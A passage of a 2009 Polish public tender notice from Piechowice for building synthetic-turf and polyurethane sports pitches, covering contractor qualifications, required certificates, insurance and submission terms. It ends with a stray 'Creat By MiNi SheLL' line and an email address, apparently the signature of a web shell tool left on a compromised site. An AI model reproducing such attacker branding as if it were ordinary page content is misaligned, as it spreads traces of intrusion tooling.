        nawierzchnią z trawy syntetycznej o wartości minimum 300.000,00 zł brutto,
b) przynajmniej jedno boisko do gier zespołowych o nawierzchni syntetycznej - 
       poliuretanowej o wartości minimum 200.000,00 zł brutto,
z podaniem ich wartości, dat wykonania oraz odbiorców. Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.) Wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik Nr 4 do  SIWZ.


    2) wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą
          uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji 
          zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia 
         a także zakresu wykonywanych przez nie czynności - wg. Załącznika nr 5 do SIWZ;
    3) pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do 
          wykonania zamówienia, jeżeli w wykazie, o którym mowa w punkcie powyżej, 
          wykonawca wskazał osoby, którymi będzie dysponował, 
     4) dokumenty potwierdzające, że osoby, które będą uczestniczyć w wykonaniu 
          zamówienia posiadają, wymagane uprawnienia, jeżeli ustawy nakładają obowiązek 
         posiadania takich uprawnień. Są to dokumenty potwierdzające posiadanie uprawnień   
         budowlanych do kierowania robotami budowlanymi przez wskazane osoby w 
         zakresie niezbędnym do wykonania zamówienia w specjalnościach: 
-  konstrukcyjno-budowlanej, 
- instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych,
 - instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
oraz zaświadczenia, wydane przez właściwą izbę samorządu zawodowego (Okręgową Izbę Inżynierów Budownictwa), potwierdzające wpis danej osoby na listę członków właściwej izby.

3.	W celu potwierdzenia spełnienia warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia do oferty dołączyć należy:
1)	   Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 PLN. 
Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 PLN.

WARUNKI PRZEDMIOTOWE


W celu potwierdzenia, że oferowane roboty budowlane odpowiadają wymaganiom określonym przez Zamawiającego winien dołączyć do oferty: Wykaz oświadczeń lub dokumentów potwierdzających spełnianie warunków jakościowych, które należy dołączyć do oferty:


A. Dokumenty dotyczące nawierzchni poliuretanowej:
1.	certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008 lub aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni sportowe np. Laborsport, lub dokument równoważny,
2.	Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta,
3.	Atest PZH dla oferowanej nawierzchni,
4.	Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na nawierzchnię,


B. Dokumenty dotyczące nawierzchni z trawy syntetycznej:

1.	Raport z badań przeprowadzonych przez laboratorium (Laborsport lub ISA-
Sport lub Sports Labs Ltd), dotyczący oferowanej nawierzchni, potwierdzający 
zgodność jej parametrów z Handbook of Test Methods for Football Turf (dostępny 
na FIFA.com),
2.	Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1:2008, lub 
aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub wyniku badań 
specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni 
np. Laborsport, ISA-Sport, Sports Labs Ltd lub dokument równoważny,
3.	Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta,
4.	Atest PZH dla oferowanej nawierzchni,
5.	Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na 
realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez 
producenta na nawierzchnię..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://piechowice.bip.pbox.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać pod adresem: Urząd Miasta Piechowice, 58-573 Piechowice, ul.Żymierskiego 49. Opłata za 1 kpl. SIWZ 27,09 zł (koszt druku)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2009 godzina 10:00, miejsce: Ofertę należy złożyć Zamawiającemu, tj. w Urzędzie Miasta Piechowice, 58-573 Piechowice, ul.Żymierskiego 49 , pokój nr 5 (I piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com